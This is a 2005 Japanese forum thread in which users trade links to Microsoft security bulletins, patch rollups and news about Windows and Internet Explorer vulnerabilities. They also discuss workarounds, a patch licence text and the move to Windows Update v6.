Microsoft Windows Server 2003 for Itanium-based Systems および Service Pack 1 を適用した Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition
上記のソフトウェアのテストを行い、この脆弱性による影響を評価しました。それより前のバージョンに関してはサポートの対象となっていないため、この脆弱性による影響は不明です。
http://www.microsoft.com/japan/technet/security/bulletin/ms05-024.mspx

Windows 2000用修正パッチが公開，既知の「重要」セキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160620/

>>919
＞「従来のWindowsフォルダを使う」に設定変更して回避する
Win98,98SE,MEはパッチもないし今後は↑しかないわけだ



なんか穴が見つかって回避策するたびにちょっとずつ不便になって
最終的に知里も積もれば状態になってるような気がするのは漏れだけ？

従来のWindowsフォルダなんか不便で使えんぞ。
どうにかしてくれよな。

セキュリティアドバイザリいくら試験公開版だからってMSサイト内からたどりつけなかったｗ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050511/160680/

http://www.microsoft.com/japan/technet/security/advisory/892313.mspx
＞これはセキュリティ上の脆弱性ではありません。しかし、この更新プログラムは、悪質な Web サイトにアクセスさせられてしまうかもしれないユーザーに対して、追加の警告を促すために発行されました。

びっみょー

Intelのハイパースレッディングに深刻な脆弱性
http://www.itmedia.co.jp/enterprise/articles/0505/14/news009.html

IEとOutlookに未パッチの脆弱性、eEyeが概略公開
http://www.itmedia.co.jp/enterprise/articles/0505/14/news010.html

IEに強制終了させられるセキュリティ・ホール，危険性は小さい
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050601/161972/

Windows 2000向けパッチ集「Update Rollup 1」が6月1日に登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
まだかな？

> Windows 2000向けパッチ集「Update Rollup 1」が6月1日に登場
> http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050530/2/
> まだかな？

それ英語版でしょ

>>926
日本語版も時間差ほとんどないと思うよ。

＞2005 年半ばに Windows 2000 Service Pack 4 (SP4) 対応の更新プログラムのロールアップの提供を予定しています。
http://www.microsoft.com/japan/windows2000/server/evaluation/news/bulletins/rollup.asp

>>925-927
近々2kを再インスコする予定なので有難い。

Windows 2000向けIE 7.0は結局なし
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050606/1/

まあ、そうだろうとは予想してましたよ…

[IE] 画像ファイルのドラッグ＆ドロップのキャンセルによりメモリリーク
http://support.microsoft.com/default.aspx?scid=kb;ja;900856

セキュ板のWUスレがおちてるのでここにカキコ

マイクロソフト、「Windows Update v6」への段階的移行を公表
http://internet.watch.impress.co.jp/cda/news/2005/06/07/7921.html


ところでちょっと早いけどここの次スレどうする？
「ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥」の次スレも全部まとめて
（つーか住人かなりかぶってるだろｗ）
「MSソフトのセキュリティ対策スレ」
でよくない？

ちょっと広いやうな奇ガス
できれば純正メーラーで欲しいけんど…
人居ないしどうしたもんか

今月の定期便は緊急もあるそうですよ
http://www.itmedia.co.jp/enterprise/articles/0506/10/news032.html

「6月に公開するセキュリティ情報は10件，『緊急』を含む」――マイクロソフトが予告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050610/162551/

>>931
同意

「修正プログラムの検証には数週間必要」――米MSのセキュリティ担当ディレクタ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050526/161567/

まぁ検証の方がよっぽど手間かかるのは確かだろうけどさ・・・
Windowsで稼いだ利益わけわかんないところに激回すぐらいなら
社内テスト環境もっと増やして並列度あげてくれよ・・・

IE7の動作モードに関して開発者がブログに書き込み
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050613/3/

>>934
いよいよ明日（日本時間）だね

【緊急】
MS05-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (883939)
http://go.microsoft.com/?linkid=3305271
【緊急】
MS05-026 - HTML ヘルプの脆弱性により、リモートでコードが実行される (896358)
http://go.microsoft.com/?linkid=3305272
【緊急】
MS05-027 - サーバー メッセージ ブロックの脆弱性により、リモートでコードが実行される (896422)
http://go.microsoft.com/?linkid=3305273
【重要】
MS05-028 - WebClient サービスの脆弱性により、リモートでコードが実行される (896426)
http://go.microsoft.com/?linkid=3305274
【重要】
MS05-29 - Exchange Server 5.5 の Outlook Web Access の脆弱性により、クロスサイト スクリプティング攻撃が行われる (895179)
http://go.microsoft.com/?linkid=3305275
【重要】
MS05-030 - Outlook Express 用の累積的なセキュリティ更新プログラム (897715)
http://go.microsoft.com/?linkid=3305276
【重要】
MS05-031 - ステップ バイ ステップの対話型トレーニングの脆弱性により、リモートでコードが実行される (898458)
http://go.microsoft.com/?linkid=3305277
【警告】
MS05-032 - Microsoft エージェントの脆弱性により、なりすましが行われる (890046)
http://go.microsoft.com/?linkid=3305278
【警告】
MS05-033 - Telnet クライアントの脆弱性により、情報漏えいが起こる (896428)
http://go.microsoft.com/?linkid=3305279
【警告】
MS05-034 - ISA Server 2000 用の累積的なセキュリティ更新プログラム (899753)
http://go.microsoft.com/?linkid=3305280

マイクロソフト セキュリティ情報 MS02-035 更新
公開日: 2002/07/11
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305567
マイクロソフト セキュリティ情報 MS05-004 更新
公開日: 2005/02/09
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305576
マイクロソフト セキュリティ情報 MS05-019 更新
公開日: 2005/04/13
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305585

関連スレ(Win板)。人柱報告なども下記参照。
Windows updateしたときに上げるスレ 20
http://pc8.2ch.net/test/read.cgi/win/1113469880/l50
Windows Update失敗したらageるスレ 8
http://pc8.2ch.net/test/read.cgi/win/1115080461/l50

WindowsやIEに複数の危険なセキュリティ・ホール，パッチの適用が急務
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162727/
4月に公開されたWindowsのパッチが再リリース，ネットワーク接続に関する問題を解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162734/

【PC診断士】
http://pc.ai2you.com/PCshindanshi/index.asp
※無料のIDを作成する必要があります。

�@ブラウザの安全度を無料診断できます。
ノートン入れてるのにセキュリティは中の下でした。
ぶっちゃけ参考になりません。誰がやっても同じ結果（低い結果）になるんじゃないの？？
みんなも試してみよう！

�APCのクリーン度をチェックする。
こちらの方が人気ありますね。

ウホッ！結果よろしく。

>>942
IEでActiveXを許可する時点で何でもできる環境与えているのに
安全度調査も何もないだろ。
前提条件が駄目すぎる。

クリーン度調査も、ネットでやるなよ。
レジストリからドライブの中身の調査だろ
怖くて、俺にはできん。

＞＞９４３
おっしゃるとおりで・・・ｗ

えらく登録情報詳しく聞いてくんのね

ですね。
もっぱら僕は架空の氏名・住所の捨てIDですが。

「Outlook Express」に存在する複数不具合を修正するWindows XP SP2用パッチ
http://www.forest.impress.co.jp/article/2005/06/20/oebugfix.html

マイクロソフト，Windows Updateの新版v6への移行を明らかに
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050620/4/
>クライアントPCの移行は自動的で，移行期間中または，移行期間後にユーザーがWindows Updateサイトへアクセスした際に，
>Windows Update v6用クライアント・プログラムの導入プロセスが行われるという（該当サイトhttp://support.microsoft.com/default.aspx?scid=kb;ja;899789）。
>「自動更新」機能を有効にしている場合は，自動的に切り替わるという。

IEやFirefox，Operaなどにダイアログ・ボックスの発行元を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050621/163100/

次スレの案出してくだされ。＞ALL

>>949
>Operaは最新版の8.01では修正されている。他のブラウザは，6月21日時点でパッチは提供されていない。

ふ〜ン。

米Microsoft，IEのぜい弱性を認めるものの対策パッチは提供せず
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050627/2/
>同社によれば，この欠陥は実際にはバグではなく，仕様の1つであり，それはIEがWeb標準に従っているからだという。
>「これは現在の標準的なWebブラウザの機能がフィッシング攻撃に使えるという1つの例だ」と同社はある声明文で指摘した。
おいおい。

マイクロソフト セキュリティ アドバイザリ (902333)
元の場所が表示されないブラウザ ウィンドウがフィッシング詐欺に利用される可能性について 公開日: 2005年6月21日
http://www.microsoft.com/japan/technet/security/advisory/902333.mspx

トップダウン方式をやめないかぎり技術の進歩とセキュリティは相反するものの
ように見えるかもしれない。アクセスしようとするところに鍵を懸けず、
そこへ行く道を塞いでいる。私達の行く手を制限している。
新しい技術は、そこへ行く新しい道を作り出す。

「Outlook Expressのセキュリティ・ホールへの攻撃コードが出現」――米CERT/CC
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050627/163391/

■Windows 2000 SP4 用の更新プログラム ロールアップ 1
http://www.microsoft.com/downloads/details.aspx?FamilyID=c0a2ca36-1179-431c-80e6-60a494d3823d&DisplayLang=ja
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
Windows 2000 SP4 のロールアップ 1 を更新します。(機械翻訳)
http://support.microsoft.com/kb/891861
＞この更新ロールアップは、 Windows 2000 SP4 のリリースと2005年4月30日の間の Windows 2000 で生成されたセキュリティ関連更新の一覧です。
なので、Windows 2000 SP4 + RP1に2005年5月と6月のアップデートを適用する必要がある。

■Windows XP 用の更新プログラム (KB898461)
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=50c334e1-9a67-4b99-a65a-069b79267856
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
ソフトウェアの更新 898461 がバージョン 6.1.22.4 の パッケージ インストーラの Windows の固定コピーをインストールします。(機械翻訳)
http://support.microsoft.com/kb/898461

最近outbound方向でsvchostが変なリクエストしだすと思ったら
どうも自動更新がMS以外にもつなごうとするらしい
(無効にするとMBSA1.2から「リスク大」判定しやがるんでめんどーだから通知だけさせとく設定にしてたのよ）
WMP10もフルモードのまま起動するといろんな（音楽配信系？）とこにつなごうとするし
これ新しい流行なのかな？

豪セキュリティ企業がIEの問題を指摘、Microsoftも「調査を進めている」
http://internet.watch.impress.co.jp/cda/news/2005/07/01/8252.html
>オーストラリアのセキュリティベンダーであるSEC Consultは6月29日、Internet Explorer（IE）に
>ヒープオーバーフローが発生する恐れがあると警告した。これを受けて米Microsoftは30日、Security
>Advisory（903144）として調査を進めていることを公表した。

IEのパッチ未公開セキュリティ・ホールを突くコードが出現，パソコンを乗っ取られる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050704/163905/

マイクロソフト セキュリティ アドバイザリ (903144)
COM オブジェクト (Javaprxy.dll) により、Internet Explorer が異常終了する
http://www.microsoft.com/japan/technet/security/advisory/903144.mspx
回避策
Javaprxy.dll COM オブジェクトを無効にして Internet Explorer で実行されないようにする
Microsoft Windows 2000 Service Pack 3 上の Internet Explorer 5.01 Service Pack 3
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 上の Internet Explorer 5.01 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4 または Microsoft Windows XP Service Pack 1 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9
Microsoft Windows XP Service Pack 2 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=C1381768-6C6D-4568-97B1-600DB8798EBF
つづく

つづき
Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=F368E231-9918-4881-9F17-60312F82183F
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)、Microsoft Windows Server 2003 for Itanium-based Systems、および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=D785F9AB-DBE9-4272-A87E-64205690F98E
Microsoft Windows Server 2003 x64 Edition および Microsoft Windows XP Professional x64 Edition 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=68209225-A682-4008-A22B-881C401486F7
Microsoft Windows Millennium Edition 上の Internet Explorer 5.5 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=06F8CD1B-93A0-4522-AF7D-603DD5C2BACB
Microsoft Windows 98、Microsoft Windows 98 SE、または Microsoft Windows Millennium Edition 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9

7月度の月例パッチ、“緊急”は3件〜Microsoftが事前告知
http://internet.watch.impress.co.jp/cda/news/2005/07/08/8334.html

Eのコンポーネントを使うアプリケーションにセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050712/164449/

誤：Eの
正：IEの
ｽﾏｿ逝ってくる…

【新規　最大深刻度: 緊急】
Microsoft Word の脆弱性により、リモートでコードが実行される (903672) (MS05-035)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-035.mspx
マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-036.mspx
JView プロファイラの脆弱性によりリモートでコードが実行される (903235) (MS05-037)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-037.mspx
【更新　最大深刻度: 警告】
Telnet クライアントの脆弱性により、情報漏えいが起こる (896428) (MS05-033)
http://www.microsoft.com/japan/technet/security/bulletin/MS05-033.mspx
＞Services for UNIX 2.0 および Services for UNIX 2.1 用のセキュリティ
＞更新プログラムが利用可能であることをお知らせし、「セキュリティ更新
＞プログラムに関する情報」に追加のセキュリティ更新プログラムに関する
＞更新情報を掲載しました。

JView プロファイラの脆弱性によりリモートでコードが実行される (903235) (MS05-037)
のパッチって結局kill bit立てるだけだよね↓と何が違うんだろ
http://internet.watch.impress.co.jp/cda/news/2005/07/06/8295.html


と思ってたら自己解決ｗ
http://internet.watch.impress.co.jp/cda/news/2005/07/13/8391.html
＞この脆弱性はマイクロソフトの「Security Advisory」において「903144」として公表されていた。
＞マイクロソフトでは「903144」公表時に、問題となっていた「Javaprxy.dll COMオブジェクト」（Javaprxy.dll）を無効化するプログラムを配布しており、
＞このプログラムを適用しているユーザーは、今回の修正パッチを適用する必要はないという。

>966だから漏れjavaprxy.dllする回避策してるからMS05-037はしばらくスルーでいいや
（近いうちにMSJVMアンインストールするつもりだしｗ）

マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
だけ当ててこうとインストーラ実行したら

-----------------------------------------------

注 : Microsoft Corporation またはお客様の所在
地に応じては、その子会社 (以下総称して「マイクロ
ソフト」といいます) がお客様に本追加ソフトウェア
を許諾するものとします。お客様は、本追加ソフトウ
ェアと共に使用することを指定された Microsoft
Windows ソフトウェア (以下「本ソフトウェア」と
いいます) の正規に許諾された各コピーと共に、この
追加ソフトウェアを使用することができます。お客様
が本ソフトウェアの許諾を受けていない場合、本追加
ソフトウェアを使用することはできません。お客様に
よる本追加ソフトウェアの使用は、本ソフトウェアに
付属する使用許諾契約書に拘束されるものとします。


EULAID:HFX_RM.0_GDR_NRL_JA

------------------------------------------
ｴｯ!!!!!これだけ？うそーん＿|￣|○ ﾏｯﾏｻｶ　（順不同）

パッチ公開時点で穴がもう悪用されてる報告がMSに来てたつーから仕方なく当てましたよ　ええ
けど何同意してるかわかったもんじゃない
つーかこんなの有効なの？

まさか「情報の送信を了承する」とでも書いてあるんじゃないだろうな？とか思えてくる

http://www.itmedia.co.jp/enterprise/articles/0507/13/news025.html

けれどなんか危なそうな穴だし・・・こんな時に怪しい（ように思えるライセンス改定する）の勘弁してくれよ＞MS

もしもOS自体に変な動きされたらPFWなんぞあてになるわけもない
漏れはできないんでパッチ当てた（or当てられる）香具師誰かPC外でパケット監視おながい

＞MicrosoftWindows ソフトウェア (以下「本ソフトウェア」といいます)
(ry
＞お客様による本追加ソフトウェアの使用は、本ソフトウェアに
＞付属する使用許諾契約書に拘束されるものとします。

本追加ソフトウェア＝このパッチ？
本ソフトウェア＝元のWindows？

結局元々のEULAそのまま（今までと同じ）ということでいい？

ﾅﾝｶﾔﾔｺｼｲ

>>966
日本のセキュリティチームの Blog
http://www.exconn.net/Blogs/team02/archive/2005/07/13/1393.aspx
>更新プログラム自体は、アドバイザリで公開していた killbits 処理を行うものと同じものです。

マイクロソフト、アップデータを一括提供する「Microsoft Update」
http://pc.watch.impress.co.jp/docs/2005/0714/ms.htm

Windows 2000 SP4 対応の更新プログラム ロールアップ 1 (KB891861) の適用後に Excel や Word でフロッピーディスクにアクセスすると応答を停止する場合がある
http://support.microsoft.com/default.aspx?scid=kb;ja;904130&sd=rss&spid=1743
Windows Update や Microsoft Update サイトにアクセスすると 0x800700C1 エラーが表示される
http://support.microsoft.com/default.aspx?scid=kb;ja;904392
Windows 2000 Service Pack 4 対応の更新プログラム ロールアップ 1 を適用すると Outlook からパスワード変更が出来なくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;904753

既にあちこちで知られているが、
Windowsに強制終了されるセキュリティ・ホール，リモートデスクトップのユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050719/164837/
Microsoft Security Advisory (904797)
Vulnerability in Remote Desktop Protocol (RDP) Could Lead to Denial of Service
http://www.microsoft.com/technet/security/advisory/904797.mspx

>>973
上記の日本語アドバイザリ
マイクロソフト セキュリティ アドバイザリ (904797)
リモート デスクトップ プロトコル (RDP) の脆弱性によりサービス拒否が発生する
http://www.microsoft.com/japan/technet/security/advisory/904797.mspx
http://www.microsoft.com/japan/technet/security/advisory/default.mspx

「IEのJPEG画像処理にセキュリティ・ホール」――米SANS Instituteが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050725/165214/

●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●

ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html

●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●

「8月公開のセキュリティ情報は計6件，最大深刻度は『緊急』」――MSが予告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050805/165940/
http://www.microsoft.com/technet/security/bulletin/advance.mspx

ICMPの問題を修正するWindows XP SP2用パッチがダウンロードセンターで公開
http://www.forest.impress.co.jp/article/2005/08/08/icmppatch.html
ダウンロードの詳細 : Windows XP 用の更新プログラム (KB889527)
http://www.microsoft.com/downloads/details.aspx?FamilyID=cd0931a8-1f22-4613-93fe-8785bdcc3394&DisplayLang=ja
Windows XP Professional Service Pack 2-based コンピュータで（ICMP パケットを）許可するように Windows ファイアウォール機能を構成したにもかかわらず、 ICMP パケットが廃棄されます。
http://support.microsoft.com/kb/889527/ja

要WGA認証、要再起動。
いまのところ対象としてWindows XP Professional SP2だけがあがっている。